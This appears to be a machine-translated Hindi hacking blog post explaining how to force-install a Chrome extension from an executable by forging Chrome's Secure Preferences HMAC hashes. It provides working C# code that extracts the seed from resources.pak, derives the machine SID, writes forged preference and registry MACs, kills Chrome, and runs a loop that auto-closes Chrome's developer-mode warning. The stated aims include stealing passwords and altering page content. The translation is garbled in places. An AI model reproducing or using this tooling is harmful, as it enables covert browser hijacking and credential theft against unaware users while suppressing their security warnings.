क्रोम रिवर्स और एक्सटेंशन इंस्टॉलेशन

शुभ दिन, प्रिय पाठक! क्रोम को अपडेट किया जा रहा है, लेकिन क्रोम पर एक्सटेंशन को प्रोग्राम करने के लिए कोई नया लेख नहीं है, इसके अलावा --लोड-एक्सटेंशन - लेकिन यह हमारा विकल्प नहीं है, क्योंकि हम आसान तरीकों की तलाश नहीं कर रहे हैं। आज मैं आपको बताता हूँ कि एक exe-shnik के साथ सब कुछ प्राप्त करना वास्तव में कैसे संभव है: पासवर्ड, सामग्री बदलना, चोरी कैसे करना, आदि। - लेकिन यह कार्रवाई के लिए कॉल नहीं है , लेकिन केवल समीक्षा के लिए एक लेख है। कट के नीचे सारा रस।

और इसलिए, क्या हमें डेवलपर मोड में एक्सटेंशन करने की अनुमति देता है? खैर, एक नियमित विस्तार की तरह, यह सभी साइटों पर काम कर सकता है, और, उदाहरण के लिए, पासवर्ड को क्रैक करें, विज्ञापनों को लागू करें, और इसी तरह। लेकिन डेवलपर मोड में विस्तार एक अन्य सुविधा तक पहुंच प्रदान करता है, जो बहुत महत्वपूर्ण नहीं लगता है, लेकिन उपयोगी हो सकता है: हमारे पास फ़ाइल सिस्टम तक पहुंच है। हां, हम इस शोषण को एक exe फ़ाइल से लॉन्च करने जा रहे हैं और, सिद्धांत रूप में, हमें वास्तव में इसकी आवश्यकता नहीं है, लेकिन क्या होगा?

हम फाइलों का विश्लेषण करते हैं

और इसलिए, शुरुआत के लिए, आप देख सकते हैं कि एक्सटेंशन स्थापित करने के बाद कौन सी फाइलें अलग-अलग होंगी, हम पा सकते हैं कि यह% appdata% \ .. \ Local \ Google \ Chrome \ उपयोगकर्ता डेटा \ <प्रोफ़ाइल> \ Secure Preferences है। चलो सामग्री को कॉपी करते हैं, एक्सटेंशन को हटाते हैं और कॉपी को पुनर्स्थापित करते हैं - यहां बैम! और विस्तार फिर से काम करता है। आईडी को देखते हुए, आप देख सकते हैं कि इस कुंजी के साथ दो मान बदल रहे हैं: Extension.settings.id और protection.macs.extensions.settings.id - पहला सेटिंग है, दूसरा किसी प्रकार का हैश है। हम प्रकारों में चढ़ते हैं और देखते हैं - यह HMAC SHA256 है। लेकिन उसे इससे क्या मिलता है? चलो डिबगर में आते हैं, क्रोम से संलग्न करते हैं और प्रतीकों को लोड करते हैं
https://chromium-browser-symsrv.commondatastorage.googleapis.com

बलात्कार क्रोम

वाह! हमें फ़ाइल pref_hash_calculator.cc मिल गई है, डाउनलोड करें, एक ब्रेक सेट करें

 std::string PrefHashCalculator::Calculate(const std::string& path, const base::Value* value) const 

Op - हमें बीज_ मिलता है - HMAC के लिए कुंजी, और हम यह भी पता लगाते हैं कि यह तीन पंक्तियों को मिलाता है और परिणाम को HMACSHA256 (डिवाइस_आईडी + पथ + मान, बीज_) के रूप में लेता है। ठीक है, आइए हमारे बीज_ को देखें - और यहां पहला चिराग हमें इंतजार कर रहा है: यह सिर्फ "ChromeRegistryHashStoreValidationSeed" लाइन है - पूछें, इसमें गलत क्या है? और चलो गणना के परिणाम को देखते हैं, इस रास्ते में फ़ाइल में परिणामित हैश और हैश की तुलना करें - हम निराश हैं, लेकिन नहीं! "रजिस्ट्री" कुंजी में मुख्य शब्द, हम रजिस्ट्री में चढ़ते हैं, देखो - और वास्तव में, यह रजिस्ट्री में हैश के लिए कुंजी है, हमें इसकी आवश्यकता होगी।

डेबिट, डेबिट और हर जगह केवल यही कुंजी, क्या गलत है? अब आइए नजर डालते हैं कि HMACSHA256 की मानक कुंजी कितने समय के लिए होनी चाहिए? 64 बाइट्स, और सबसे अधिक संभावना है कि यह एक लाइन नहीं है, लेकिन किसी तरह की बाइट। सुलझाने के लिए? समय नहीं है! पहली धारणा - हमारा बीज_ क्रोम के प्रत्येक संस्करण में हार्डकोड किया गया है - आइए द्विपदीय और क्रोम फ़ाइलों में 64x लगातार बाइट्स के लिए सभी विकल्पों के माध्यम से सॉर्ट करने की कोशिश करें। हम एक साधारण स्क्रिप्ट लिखते हैं और लगभग एक घंटे में हमें पहला परिणाम मिलता है: हमारे बीज_ रिसोर्स में निहित हैं। आइए गूगल संरचना करें।



संस्करण 4, हमारा है 5. कुछ गलत है, शायद संरचना नहीं बदली है? लेकिन नहीं। कुछ प्रयासों के बाद, हम पाते हैं कि संरचना इस प्रकार है: 4 बाइट्स संस्करण (5), 4 बाइट्स - एन्कोडिंग। (1), 2 बाइट्स - रिकॉर्ड की संख्या, 2 बाइट्स यह स्पष्ट नहीं है कि क्या है। अगले प्रारूप में प्रविष्टियां हैं: 2 बाइट्स - आईडी, 4 बाइट्स - फ़ाइल की शुरुआत के सापेक्ष ऑफसेट। हम 64 बाइट्स की लंबाई के साथ एक खंड की तलाश कर रहे हैं - और हां, हम इसे ढूंढते हैं, यह हमारा बीज_ है। अब चलो एक फंक्शन को बीज_ के लिए खोज करने के लिए लिखें।

 public static byte[] GetSeed(string resources_pak) { //Open stream using (FileStream fs = File.OpenRead(resources_pak)) using (BinaryReader reader = new BinaryReader(fs)) { // Read in all pairs. //4 bytes - Version (Assume, that is 5 or 4) int version = reader.ReadInt32(); int second_dword = reader.ReadInt32(); int count = 0; if (version == 0x05) { count = (reader.ReadUInt16()) + 1; reader.ReadUInt16(); } else { count = second_dword; //Skip useless byte reader.ReadByte(); } uint last_offset = (uint)(count) * 6 + (uint)fs.Position; for (int i = 0; i < count; i++) { //Word: ID uint id = (uint)reader.ReadInt16(); //DWord: Offset from file start uint offset = (reader.ReadUInt32()); //Assume, that seed_ is 64 bytes long if (offset - last_offset == 64) { //Save last position in file long last = fs.Position; //Go to section position fs.Seek(last_offset, SeekOrigin.Begin); //Allocate space uint want = offset - last_offset; byte[] u = new byte[want]; for (int o = 0; o < want; o++) u[o] = reader.ReadByte(); //Return carret back fs.Seek(last, SeekOrigin.Begin); return u; } last_offset = offset; } } return null; } 

ठीक है, चलो सेटिंग्स बदलते हैं, और हैश - विफलता को बदलने की कोशिश करते हैं। पहली चीज जो आप क्रोम प्रकार में पा सकते हैं वह यह है कि सभी खाली वस्तुओं को मूल्य से हटा दिया जाता है। ठीक है, यह कहा गया है।

फिर से असफलता - हमें संरक्षण के साथ ही HMACSHA256 उत्पन्न करने की आवश्यकता है। साथ ही, इस मामले में मार्ग को छोड़ दिया जाना चाहिए। सुपर! हम प्राप्त किया। लेकिन, हम डिवाइस_आईडी के बारे में पूरी तरह से भूल गए - मुझे यह कहां मिल सकता है? पुराने संस्करणों में, यह थर्ड-पार्टी RLZ लाइब्रेरी से मशीन है। नए लोगों में, बस पीसी के एसआईडी। इसे कैसे प्राप्त करें? दूसरे विकल्प और क्रोम के नए संस्करणों के लिए:

 public static string GetSID() { StringBuilder sb = new StringBuilder(260); int size = 260; GetComputerName(sb, ref size); byte[] Sid = null; uint cbSid = 0; string accountName = sb.ToString(); StringBuilder referencedDomainName = new StringBuilder(); uint cchReferencedDomainName = (uint)referencedDomainName.Capacity; SID_NAME_USE sidUse; int err = NO_ERROR; if (!LookupAccountName(null, accountName, Sid, ref cbSid, referencedDomainName, ref cchReferencedDomainName, out sidUse)) { err = Marshal.GetLastWin32Error(); if (err == ERROR_INSUFFICIENT_BUFFER || err == ERROR_INVALID_FLAGS) { Sid = new byte[cbSid]; referencedDomainName.EnsureCapacity((int)cchReferencedDomainName); err = NO_ERROR; if (!LookupAccountName(null, accountName, Sid, ref cbSid, referencedDomainName, ref cchReferencedDomainName, out sidUse)) err = Marshal.GetLastWin32Error(); } } else { // Consider throwing an exception since no result was found } if (err == 0) { if (!ConvertSidToStringSid(Sid, out IntPtr ptrSid)) { err = Marshal.GetLastWin32Error(); } else { string sidString = Marshal.PtrToStringAuto(ptrSid); LocalFree(ptrSid); return sidString; } } return null; } 

और, पुराने संस्करण के लिए:

 public static string GetMachineId(string sid) { string dir = Environment.SystemDirectory; dir = dir.Substring(0, dir.IndexOf("\\") + 1); StringBuilder volname = new StringBuilder(261); StringBuilder fsname = new StringBuilder(261); uint sernum, maxlen; FileSystemFeature flags; if (!GetVolumeInformation(dir, volname, volname.Capacity, out sernum, out maxlen, out flags, fsname, fsname.Capacity)) Marshal.ThrowExceptionForHR(Marshal.GetHRForLastWin32Error()); byte[] sid_str = (Hash(sid)); byte[] bts = new byte[sid_str.Length + 4]; for (int i = 0; i < sid_str.Length; i++) bts[i] = sid_str[i]; for (int i = 0; i < sizeof(int); i++) { int shift_bits = 8 * (sizeof(int) - i - 1); bts[sid_str.Length + i] = (byte)((sernum >> shift_bits) & 0xFF); } byte b = Crc8.Gen(bts); var sb = new StringBuilder(bts.Length + 1); foreach (byte bb in bts) sb.Append(bb.ToString("X2")); sb.Append(b.ToString("X2")); return sb.ToString(); } 

और इसलिए, यह सेटिंग्स पर मज़ाक उड़ाने और फ़ाइल को बचाने के लिए रहता है, लेकिन क्रोम को बंद करना:

  public static void Install() { string path = Unzip(); string id = ""; string flags = "" + ((1 << 7) | (1 << 2)); string loc = "4"; id = "dblokgoogmhjemeebajnamjdmloolcjd"; string setting = "  "; preferences = SetValue(preferences, "extensions.settings." + id, setting.Replace("<", "\\u003C")); preferences = SetValue(preferences, "protection.macs.extensions.settings." + id, ComputeHash(seed_, "extensions.settings." + id, Serialize(JSONParser.ParseValue(typeof(object), setting)))); string abc = "HKEY_CURRENT_USER\\Software\\Google\\Chrome\\PreferenceMACs\\Default\\extensions.settings"; string reg_key = ComputeHash(Encoding.ASCII.GetBytes("ChromeRegistryHashStoreValidationSeed"), "extensions.settings." + id, Serialize(JSONParser.ParseValue(typeof(object), setting))); Registry.SetValue(abc, id, reg_key); string macs = GetSecure("protection.macs"); preferences = SetValue(preferences, "protection.super_mac", ComputeHash(seed_, "", macs)); Process process = new Process(); // Stop the process from opening a new window process.StartInfo.RedirectStandardOutput = true; process.StartInfo.UseShellExecute = false; process.StartInfo.CreateNoWindow = true; // Setup executable and parameters process.StartInfo.FileName = @"taskkill.exe"; process.StartInfo.Arguments = "/im chrome.exe /f"; // Go process.Start(); process.WaitForExit(); Thread.Sleep(150); File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\..\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences", preferences); } 

यह भी ध्यान रखें कि अब जब आप ब्राउज़र खोलते हैं, तो विंडो "डेवलपर मोड में एक्सटेंशन को अक्षम करता है" खुलता है - इसे कैसे बंद करें यह पहले से ही हर किसी की पसंद है। मैं अपने बाद एक स्ट्रीम कैसे छोड़ सकता हूं जो WinAPI के माध्यम से इस विंडो को बंद कर देगा:

 public static void CheckWindows() { while (true) { Process[] pcs = Process.GetProcessesByName("chrome"); if (pcs.Length > 0) { List<IntPtr> ww = GetChildWindows(IntPtr.Zero); foreach (var hwnd in ww) { try { uint pidd = 0; GetWindowThreadProcessId(hwnd, out pidd); IntPtr pid = (IntPtr)pidd; IntPtr hProcess = OpenProcess(0x0410, false, pidd); StringBuilder text = new StringBuilder(1000); GetModuleFileNameEx(hProcess, IntPtr.Zero, text, text.Capacity); CloseHandle(hProcess); if (!text.ToString().EndsWith("chrome.exe")) continue; const int nChars = 256; StringBuilder Buff = new StringBuilder(nChars); if (GetWindowText(hwnd, Buff, nChars) > 0) { string name = Buff.ToString(); if (names.Contains(name)) SendMessage((IntPtr)hwnd, WM_CLOSE, IntPtr.Zero, IntPtr.Zero); } Thread.Sleep(1); } catch { } Thread.Sleep(1); } } else Thread.Sleep(10); } } 

गुड लक और एथिकल हैकिंग! जो यैंडेक्स ब्राउज़र के साथ ऐसा करना जानता है - यह जानना बहुत दिलचस्प होगा कि क्या मैं इसे एक सप्ताह के लिए लेने की कोशिश कर रहा हूं, यह काम नहीं कर रहा है।